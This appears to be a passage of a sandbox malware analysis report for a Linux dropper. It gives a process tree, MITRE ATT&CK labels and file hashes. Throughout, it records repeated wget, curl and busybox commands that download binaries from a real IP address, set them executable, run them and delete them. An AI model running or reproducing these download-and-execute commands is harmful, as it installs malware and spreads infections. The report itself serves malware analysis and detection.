/bin/rmrm QKJpUm5ZV83rt7XeLzw7yTncw9HkEAqNdb2⤵PID:951
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/6hp4EEZHshIeQOsdpR6uHaAvuMTZypMBy12⤵PID:952
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/6hp4EEZHshIeQOsdpR6uHaAvuMTZypMBy12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:953
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/6hp4EEZHshIeQOsdpR6uHaAvuMTZypMBy12⤵PID:954
-
-
/bin/chmodchmod 777 6hp4EEZHshIeQOsdpR6uHaAvuMTZypMBy12⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/6hp4EEZHshIeQOsdpR6uHaAvuMTZypMBy1./6hp4EEZHshIeQOsdpR6uHaAvuMTZypMBy12⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm 6hp4EEZHshIeQOsdpR6uHaAvuMTZypMBy12⤵PID:957
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0uz0orHfeZNJXiK3G3RNTADpGP7sa8BAm82⤵PID:958
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0uz0orHfeZNJXiK3G3RNTADpGP7sa8BAm82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0uz0orHfeZNJXiK3G3RNTADpGP7sa8BAm82⤵PID:960
-
-
/bin/chmodchmod 777 0uz0orHfeZNJXiK3G3RNTADpGP7sa8BAm82⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/0uz0orHfeZNJXiK3G3RNTADpGP7sa8BAm8./0uz0orHfeZNJXiK3G3RNTADpGP7sa8BAm82⤵
- Executes dropped EXE
PID:962
-
-
/bin/rmrm 0uz0orHfeZNJXiK3G3RNTADpGP7sa8BAm82⤵PID:963
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/pUHgaqxg6NP2Uq8jJ0HLdRT6MJ2s4zOnxr2⤵PID:964
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pUHgaqxg6NP2Uq8jJ0HLdRT6MJ2s4zOnxr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pUHgaqxg6NP2Uq8jJ0HLdRT6MJ2s4zOnxr2⤵PID:966
-
-
/bin/chmodchmod 777 pUHgaqxg6NP2Uq8jJ0HLdRT6MJ2s4zOnxr2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/pUHgaqxg6NP2Uq8jJ0HLdRT6MJ2s4zOnxr./pUHgaqxg6NP2Uq8jJ0HLdRT6MJ2s4zOnxr2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm pUHgaqxg6NP2Uq8jJ0HLdRT6MJ2s4zOnxr2⤵PID:969
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/HN4zjtbqzr238vxIimKIC09iW0vBbLjgto2⤵PID:970
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/HN4zjtbqzr238vxIimKIC09iW0vBbLjgto2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/HN4zjtbqzr238vxIimKIC09iW0vBbLjgto2⤵PID:972
-
-
/bin/chmodchmod 777 HN4zjtbqzr238vxIimKIC09iW0vBbLjgto2⤵
- File and Directory Permissions Modification
PID:973
-
-
/tmp/HN4zjtbqzr238vxIimKIC09iW0vBbLjgto./HN4zjtbqzr238vxIimKIC09iW0vBbLjgto2⤵
- Executes dropped EXE
PID:974
-
-
/bin/rmrm HN4zjtbqzr238vxIimKIC09iW0vBbLjgto2⤵PID:975
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qXrmgq3p85w30klarOtdiw4ctUnyHk6PBT2⤵PID:976
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qXrmgq3p85w30klarOtdiw4ctUnyHk6PBT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:977
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qXrmgq3p85w30klarOtdiw4ctUnyHk6PBT2⤵PID:978
-
-
/bin/chmodchmod 777 qXrmgq3p85w30klarOtdiw4ctUnyHk6PBT2⤵
- File and Directory Permissions Modification
PID:979
-
-
/tmp/qXrmgq3p85w30klarOtdiw4ctUnyHk6PBT./qXrmgq3p85w30klarOtdiw4ctUnyHk6PBT2⤵
- Executes dropped EXE
PID:980
-
-
/bin/rmrm qXrmgq3p85w30klarOtdiw4ctUnyHk6PBT2⤵PID:981
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/tCIKXQsohvI8zLb5uZVKcpcJlAE953Te7C2⤵PID:982
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/tCIKXQsohvI8zLb5uZVKcpcJlAE953Te7C2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:983
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tCIKXQsohvI8zLb5uZVKcpcJlAE953Te7C2⤵PID:984
-
-
/bin/chmodchmod 777 tCIKXQsohvI8zLb5uZVKcpcJlAE953Te7C2⤵
- File and Directory Permissions Modification
PID:985
-
-
/tmp/tCIKXQsohvI8zLb5uZVKcpcJlAE953Te7C./tCIKXQsohvI8zLb5uZVKcpcJlAE953Te7C2⤵
- Executes dropped EXE
PID:986
-
-
/bin/rmrm tCIKXQsohvI8zLb5uZVKcpcJlAE953Te7C2⤵PID:987
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/kFevGvzr9hA5kIgiZLUtLp1YF926JJZZR22⤵PID:988
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/kFevGvzr9hA5kIgiZLUtLp1YF926JJZZR22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:989
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/kFevGvzr9hA5kIgiZLUtLp1YF926JJZZR22⤵PID:990
-
-
/bin/chmodchmod 777 kFevGvzr9hA5kIgiZLUtLp1YF926JJZZR22⤵
- File and Directory Permissions Modification
PID:991
-
-
/tmp/kFevGvzr9hA5kIgiZLUtLp1YF926JJZZR2./kFevGvzr9hA5kIgiZLUtLp1YF926JJZZR22⤵
- Executes dropped EXE
PID:992
-
-
/bin/rmrm kFevGvzr9hA5kIgiZLUtLp1YF926JJZZR22⤵PID:993
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97